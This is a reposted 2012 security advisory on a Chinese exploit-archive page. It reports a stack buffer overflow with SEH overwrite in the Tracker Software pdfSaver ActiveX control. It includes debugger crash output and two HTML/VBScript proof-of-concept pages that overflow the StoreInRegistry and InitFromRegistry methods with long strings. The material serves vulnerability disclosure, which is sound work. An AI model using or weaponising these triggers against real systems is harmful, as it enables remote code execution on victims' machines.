首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2012-02-01  
Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)
Vendor:
-------
Tracker Software Products Ltd.
Product web page:
-----------------
http://www.tracker-software.com
Affected version:
-----------------
3.60.0128
Summary:
--------
PDF-Saver Technology is a unique new feature of PDF-XChange software
which allows printing jobs to be combined prior to the final PDF file
being generated - (e.g. to join 3 pages of Excel spreadsheet, 5 slides
of PowerPoint presentation and 10 pages of Word document into one PDF
document).
Description:
------------
The PDF Printer Preferences ActiveX suffers from a buffer overflow
vulnerability. When a large buffer is sent to the sub_path item of the
StoreInRegistry function, and the sub_key item of the InitFromRegistry
function, in pdfxctrl.dll module, we get a SEH overwrite. An attacker
can gain access to the system of the affected node and execute arbitrary
code.
------------------------------------------------------------------------
(1fac.1ea8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013e9e0 ebx=00000003 ecx=0000008c edx=00001815 esi=0013cd74 edi=0013fffd
eip=7c834d8f esp=0013b75c ebp=0013b780 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
kernel32!lstrcatA+0x36:
7c834d8f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0013b770: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!lstrcatA+45 (7c84086d)
                func:   kernel32!lstrcatA+49 (7c840876)
0013f1ac: 41414141
Invalid exception stack at 41414141
0:000> d esp
0013b75c  2a 30 00 00 cc 63 18 00-03 00 00 00 5c b7 13 00  *0...c......\...
0013b76c  2a 30 00 00 ac f1 13 00-c0 9a 83 7c a8 4d 83 7c  *0.........|.M.|
0013b77c  00 00 00 00 e4 ed 13 00-e7 d8 01 10 e0 e9 13 00  ................
0013b78c  90 b7 13 00 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
0013b79c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7cc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
------------------------------------------------------------------------
Tested on:
----------
Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by:
----------------------------
Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID:
------------
ZSL-2012-5067
Advisory URL:
-------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php
25.01.2012
PoC (COMRaider):
----------------
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype  = "Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_path As String )"
memberName = "StoreInRegistry"
progid     = "pdfxctrlLib.PdfPrinterPreferences"
argCount   = 2
arg1=1
arg2=String(6164, "A")
zsl.StoreInRegistry arg1 ,arg2
</script>
--------------------
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype  = "Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_key As String )"
memberName = "InitFromRegistry"
progid     = "pdfxctrlLib.PdfPrinterPreferences"
argCount   = 2
arg1=1
arg2=String(14356, "A")
zsl.InitFromRegistry arg1 ,arg2
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS12-004 midiOutPlayNextPolyEv
·sudo 1.8.0 - 1.8.3p1 Format St
·HP Diagnostics Server magentse
·Adobe Flash Player MP4 Sequenc
·Sysax Multi Server 5.50 Create
·EdrawSoft Office Viewer Compon
·HP Easy Printer Care XMLCacheM
·Apache httpOnly Cookie Disclos
·zFTPServer Suite 6.0.0.52 'rmd
·Mindjet MindManager 2012 10.0.
·Acpid 1:2.0.10-1ubuntu2 Privil
·frontpage_express2.02 Denial o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved